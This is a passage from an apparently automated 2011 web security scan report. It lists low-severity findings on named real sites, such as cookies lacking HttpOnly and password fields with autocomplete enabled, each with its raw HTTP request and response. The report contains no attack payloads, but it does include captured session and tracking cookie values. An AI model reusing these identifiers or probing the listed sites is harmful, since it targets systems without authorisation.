The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:55 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:39 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 136
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:55 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:00 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=909
Connection: Keep-Alive
Content-Length: 102759

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Free sof
...[SNIP]...

11.60. http://landesm.gfi.com/event-log-analysis-sm/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:46:07 GMT
Etag: "17424fa7bc85ec85fc725f2b8328bb89ca03be4c"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Content-Length: 30171
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...

11.61. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:17:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

11.62. http://www.ccmaine.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 10 Jan 2011 18:18:50 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Set-Cookie: 1c7b37f4426f042e0fdf703338ebc738=d5da178e07009ab3ea602b970835b537; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.ccmaine.net/HomePage
Content-Length: 0
Content-Type: text/html; charset=UTF-8


11.63. http://www.zdnet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:08:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 117305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

12. Password field with autocomplete enabled
There are 15 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://account.theregister.co.uk/register/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://account.theregister.co.uk
Path:   /register/

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:21 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 30609

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h2>


<form action="http://account.theregister.co.uk/register/" method="post" id="acc-edit">
<input type="hidden" name="product" value="theregister_newsletter">
...[SNIP]...
<td><input type="password" name="password" value="" size="30"></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" size="30"></td>
...[SNIP]...

12.2. http://darkblue.com/index.htm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://darkblue.com
Path:   /index.htm

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /index.htm HTTP/1.1
Host: darkblue.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Dar
...[SNIP]...
</h3>
<form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST">
    <input type="hidden" name="logintype" value="pub">
...[SNIP]...
<div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div>
...[SNIP]...

12.3. http://darkblue.com/index.htm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://darkblue.com
Path:   /index.htm

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /index.htm HTTP/1.1
Host: darkblue.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Dar
...[SNIP]...
</h3>
<form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST">
    <input type="hidden" name="logintype" value="adv">
...[SNIP]...
<div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div>
...[SNIP]...

12.4. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

12.5. https://edit.yahoo.com/registration

Summary

Severity:   Low
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /registration?.src=fpctx&.intl=us&.done=http://www.yahoo.com/ HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=80eipqp6i4psl&b=3&s=j8

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 22:45:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 50154


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
   <t
...[SNIP]...
<!-- begin: form -->
<form id="regFormBody" name="regFormBody" action="/registration" method="post">

<input type="hidden" id="parentreg" name=".parentreg" value="">
...[SNIP]...
<div class="collection">
<input type="password" name="password" id="password" value="" size="32" maxlength="32" class="">
<div id="meter_tag">
...[SNIP]...
<div class="collection">
<input type="password" name="passwordconfirm" id="passwordconfirm" value="" size="32" maxlength="32" class="">
</div>
...[SNIP]...

12.6. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</p>
<form method=POST action="http://account.theregister.co.uk/login/">
<input type=hidden name=r value="http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/">
...[SNIP]...
</span>
<input class=text type=password name=password></label>
...[SNIP]...

12.7. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</div>


<form method=POST action="http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/" class=box id=comment-form name=comment-form>

<h3>
...[SNIP]...
<div><input name=password type=password></div>
...[SNIP]...

12.8. http://lists.arin.net/mailman/listinfo/arin-whoisrws

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lists.arin.net
Path:   /mailman/listinfo/arin-whoisrws

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:59 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- $Revision: 2.4 $ -->
<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-whoisrws">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

12.9. http://whitepapers.theregister.co.uk/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:34 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 34233

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Whitepapers and tech resources from The Register</title>
<link rel="stylesheet" href="/
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

12.10. http://whitepapers.theregister.co.uk/search/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /search/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /search/ HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:35 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24426

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Search for ...... ... Reg Whitepapers</title>
<link rel="stylesheet" href="/style_picke
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/search/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

12.11. http://www.43things.com/person/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.43things.com
Path:   /person/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...
</div>


<form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function(request){ajax_status('loadingmsg','<img src=/images/icons/indicator.gif align=middle>', 'replace')}, parameters:Form.serialize(this)}); return false;">

<table class="login-form">
...[SNIP]...
<td align="left" style="background:url('http://acf.43things.com/images/nav/login_input_background.gif') no-repeat left top; width:299px;"><input class="login-input" id="person_password" name="person[password]" size="30" type="password" /></td>
...[SNIP]...

12.12. http://www.admob.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.admob.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...
</div>
<form method="post" action="https://www.admob.com/home/login/login">
<label for="username">
...[SNIP]...
</label>
<input class="password" type="password" name="password" />
<div id="login_widget_extra">
...[SNIP]...

12.13. http://www.connect.facebook.com/widgets/fan.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x25; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 12 Jan 2011 04:27:30 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.connect.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.14. http://www.sentinelinvestments.com/advisor-login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sentinelinvestments.com
Path:   /advisor-login

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /advisor-login HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:03:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...
</DIV>

       <form method="post" action="/inc/form_scripts/advisor_login_script.php">
   
       <DIV ID="advisor_login_topleft_form_email">
...[SNIP]...
<DIV ID="advisor_login_topleft_form_password">Password:
<input name="password" id="password" type="password" value="" /></DIV>
...[SNIP]...

12.15. http://www.tukaiz.com/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tukaiz.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.1
Set-Cookie: fc0fc83ec7006e5c547094008560a464=-; path=/
Date: Wed, 12 Jan 2011 05:01:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</h3>
                   <form action="http://www.tukaiz.com/index.php" method="post" name="login" >
   
   <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<br />
           <input type="password" id="mod_login_password" name="passwd" class="inputbox" size="10" alt="password" />
           <br />
...[SNIP]...

13. Source code disclosure
There are 5 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


13.1. http://www.addthis.com/bookmark.php

Summary

Severity:   Low
